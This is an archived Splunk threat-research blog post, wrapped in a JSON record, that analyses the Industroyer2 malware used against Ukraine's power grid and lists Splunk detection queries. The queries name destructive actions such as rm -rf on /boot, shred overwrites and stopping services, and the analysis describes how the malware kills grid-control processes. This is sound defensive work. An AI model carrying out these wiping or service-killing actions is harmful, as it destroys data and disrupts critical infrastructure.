{
	"id": "f737c115-47c3-4232-87a1-bb8b28f9c435",
	"created_at": "2026-04-06T00:19:10.470739Z",
	"updated_at": "2026-04-10T03:24:17.931694Z",
	"deleted_at": null,
	"sha1_hash": "d6a194bcb216e6c55cbb14942953db47a1b59e15",
	"title": "Threat Update: Industroyer2 | Splunk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4961430,
	"plain_text": "Threat Update: Industroyer2 | Splunk\r\nBy Splunk Threat Research Team\r\nPublished: 2022-06-23 · Archived: 2026-04-05 19:07:36 UTC\r\nSplunk is committed to using inclusive and unbiased language. This blog post might contain terminology that we\r\nno longer use. For more information on our updated terminology and our stance on biased language, please visit\r\nour blog post. We appreciate your understanding as we work towards making our community more inclusive for\r\neveryone.\r\nThe Splunk Threat Research Team (STRT) continues to monitor new relevant payloads to the ongoing conflict in\r\nEastern Europe. One of these new payloads was found by the Ukranian CERT named “Industroyer2.” The name of\r\nthis new payload references the original \"Industroyer\" malicious payload used against the country of Ukraine's\r\npower grid in 2016 and allegedly was able to affect a fifth of the power capacity of the city of Kyiv.\r\nAccording to the recent Ukraine CERT and ESET report, Industroyer2 resembles the former Industroyer in\r\nfunctionality and is also targeting the electric grid containing commands targeting high-voltage electrical\r\nsubstations. It was reported that Industroyer2 was also used along with CaddyWiper, another payload recently\r\naddressed by the Splunk Threat Research Team. This payload — in combination with previous featured\r\ndestructive payloads — targets CPEs. These customer premise devices such as modems, cable modems, and\r\ninternet gateways are devices that provide connectivity to the great majority of commercial and residential\r\ncustomers, and speak to the attacker’s intention of overwhelming or degrading the victim's infrastructure.\r\nThe following is an analysis of relevant detection opportunities of this payload and observed TTPs during the\r\ndeployment of this payload.\r\nParameter Check\r\nThe first part of its code is checking parameters that can execute some of its features related to timing and logging.\r\nBelow is the code screenshot of this checking with its 2 parameters.\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 1 of 14\n\nThe first parameter is “-t” which will trigger a waiting timer relative to the current minute of the system time. For\r\nexample, if your system time is 14:19:22 PM and you use this parameter with a value of 25 as the third parameter,\r\nit means it will wait 5 mins before it executes its code like the screenshot below.\r\nWhile the “-o” parameter is a feature to redirect its console logs to a debug log file you inputted as the 3rd\r\nparameter.\r\nConsole Logs\r\nUpon executing this malware, it outputs some console logs with a customized code structure that tells something\r\nabout what features it executes. Some of it will be discussed further in the next subheadings. Below is an example\r\nof the console logs during its execution.\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 2 of 14\n\nTerminate Process and Rename Process File Path\r\nThis function enumerates all running processes in the targeted host and looks for the process named\r\n“PServiceControl.exe” and also the process name stated in its config data. It will also look for the file path of that\r\nprocess in a specific folder that is in the config file and rename it with “.MZ” file extension.\r\nThe code screenshot below shows the process termination and renaming of process file path. We can see in the\r\ncode snippet the code “RNM” plus the last error code after the call MoveFileA() function that will be displayed in\r\nits console logs after executing this part of the code. You can see that in the console log screenshot earlier.\r\nHardCoded Configuration Data\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 3 of 14\n\nThis malware contains hardcoded configuration files that will be parsed with the help of\r\nCommandLineToArgvW() function and put in a structure that will be used later in its code. Below is the\r\nscreenshot of the parsing function.\r\nThe config data contains values and checks that this payload uses through its execution. We saw four main\r\ncomponents of its three configuration data settings that are hardcoded to its data section like the screenshot below:\r\nThe first component is the IP address of devices where it tries to communicate via IEC-104 protocol, the next one\r\nis the port number (2404), third is the process name (PService_PPD.exe) it tries to kill aside from\r\n“PServicecontrol.exe” and a file path (D:\\OIK\\DevCounter) where it locates the process file path it tries to kill to\r\nrename it with .MZ file extension.\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 4 of 14\n\nDetections\r\nBelow are the detections related to the Industroyer2 malware and other components found during the attack that\r\nwas mentioned in the ESET blog and CERT-UA blog.\r\nLinux Adding Crontab Using List Parameter\r\nThis analytic identifies a suspicious cron jobs modification using crontab list parameters. This command line\r\nparameter can be abused by malware like Industroyer2, adversaries, and red teamers to add a crontab entry to their\r\nmalicious code to execute to the schedule they want.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name = \"crontab\" Processes.process= \"* -l*\"\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.par\r\n | `drop_dm_object_name(Processes)`\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 5 of 14\n\n| `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nLinux Deleting Critical Directory Using RM Command\r\nThis analytic identifies a suspicious deletion of a critical folder in Linux machine using rm command. This\r\ntechnique was seen in Industroyer2 campaign to wipe or destroy energy facilities of a targeted sector.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name =rm AND Processes.process= \"* -rf *\" AND Processes.process IN (\"*/boot/*\", \"*/va\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 6 of 14\n\nLinux Disable Services\r\nThis analytic identifies events that attempt to disable a service. This is typically identified in parallel with other\r\ninstances of service enumeration of attempts to stop a service and then delete it.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name IN (\"systemctl\", \"service\", \"svcadm\") Processes.process = \"* disable*\"\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nLinux Shred Overwrite Command\r\nThis analytic identifies a shred process to overwrite files in a linux machine. Shred Linux application is designed\r\nto overwrite a file to hide its contents or make the deleted file unrecoverable.\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 7 of 14\n\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name =shred AND Processes.process IN (\"*-n*\", \"*-u*\", \"*-z*\", \"*-s*\")\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nLinux Stop Services\r\nThis analytic identifies events that attempt to stop or clear a service.\r\nThis is typically identified in parallel with other instances of service enumeration of attempts to stop a service and\r\nthen delete it.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name IN (\"systemctl\", \"service\", \"svcadm\") Processes.process =\"*stop*\"\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n Processes.process_guid Processes.dest Processes.user\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 8 of 14\n\n| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nLinux High Frequency Of File Deletion In Boot Folder\r\nThis analytic identifies a high frequency of file deletion relative to process name and process id /boot/ folder.\r\n| tstats `security_content_summariesonly` values(Filesystem.file_name) as deletedFileNames values(Filesystem.fi\r\n FROM datamodel=Endpoint.Filesystem\r\n where Filesystem.action=deleted Filesystem.file_path = \"/boot/*\"\r\n by _time span=1h Filesystem.dest Filesystem.process_guid Filesystem.action\r\n | `drop_dm_object_name(Filesystem)`\r\n |rename process_guid as proc_guid\r\n |join proc_guid, _time [\r\n | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.parent_proc\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 9 of 14\n\nNOT (Processes.parent_process_name IN (\"/usr/bin/dpkg\", \"*usr/bin/python*\", \"*/usr/bin/apt-*\", \"/bin/rm\", \"*s\r\n by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.paren\r\n | `drop_dm_object_name(Processes)`\r\n |rename process_guid as proc_guid\r\n | fields _time dest user parent_process_name parent_process process_name process_path process proc_guid regis\r\n | table process_name process proc_guid action _time deletedFileNames deletedFilePath numOfDelFilePath paren\r\n | where numOfDelFilePath \u003e= 200\r\nWindows Processes Killed By Industroyer2 Malware\r\nThis analytic identifies known processes killed by Industroyer2 malware.\r\nThis technique was seen in the Industroyer2 malware attack that tries to kill several processes of windows host\r\nmachines related to the energy facility network.\r\n`sysmon` EventCode=5 process_name IN (\"PServiceControl.exe\", \"PService_PPD.exe\")\r\n | stats min(_time) as firstTime max(_time) as lastTime count by process_name process process_path process_gui\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 10 of 14\n\n| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`\r\nWindows Hidden Schedule Task Settings\r\nThe following query utilizes Windows Security EventCode 4698. A scheduled task was created to identify\r\nsuspicious tasks registered on Windows either via schtasks.exe OR TaskService with hidden settings that are\r\nunique entry of malware like Industroyer2 or attack that uses lolbin to download other files or payload to the\r\ninfected machine.\r\n`wineventlog_security` EventCode=4698\r\n | xmlkv Message\r\n | search Hidden = true\r\n | stats count min(_time) as firstTime max(_time) as lastTime by Task_Name, Command, Author, Hidden, dest\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 11 of 14\n\nWindows Linked Policies In ADSI Discovery\r\nThis analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type\r\naccelerator being used to query Active Directory for domain groups.\r\n`powershell` EventCode=4104 ScriptBlockText = \"*[adsisearcher]*\" ScriptBlockText = \"*objectcategory=organizatio\r\n | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nWindows Root Domain Linked Policies Discovery\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 12 of 14\n\nThis analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type\r\naccelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage\r\n`[Adsisearcher]` to enumerate root domain linked policies for situational awareness and Active Directory\r\nDiscovery.\r\n`powershell` EventCode=4104 ScriptBlockText = \"*[adsisearcher]*\" ScriptBlockText = \"*.SearchRooT*\" ScriptBlockT\r\n | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\n* To see a detailed explanation on the different types please refer to this wiki.\r\nIOC:\r\nMitigation\r\nPlease follow CISA and NSA Joint advisory on securing Operational Technology (OT).\r\nLearn More\r\nYou can find the latest content about security analytic stories on GitHub and in Splunkbase. Splunk Security\r\nEssentials also has these detections available via push update. In the upcoming weeks, the Splunk Threat Research\r\nTeam will be releasing a more detailed blog post on this analytic story. Stay tuned!\r\nFor a full list of security content, check out the release notes on Splunk Docs.\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 13 of 14\n\nFeedback\r\nAny feedback or requests? Feel free to put in an issue on GitHub and we’ll follow up. Alternatively, join us on the\r\nSlack channel #security-research. Follow these instructions If you need an invitation to our Splunk user groups on\r\nSlack.\r\nWe would like to thank the following for their contributions to this post: Teoderick Contreras, Rod Soto, Jose\r\nHernandez, Patrick Barreiss, Lou Stella, Mauricio Velazco, Michael Haag, Bhavin Patel, and Eric McGinnis\r\nSource: https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html"
	],
	"report_names": [
		"threat-update-industroyer2.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434750,
	"ts_updated_at": 1775791457,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d6a194bcb216e6c55cbb14942953db47a1b59e15.pdf",
		"text": "https://archive.orkl.eu/d6a194bcb216e6c55cbb14942953db47a1b59e15.txt",
		"img": "https://archive.orkl.eu/d6a194bcb216e6c55cbb14942953db47a1b59e15.jpg"
	}
}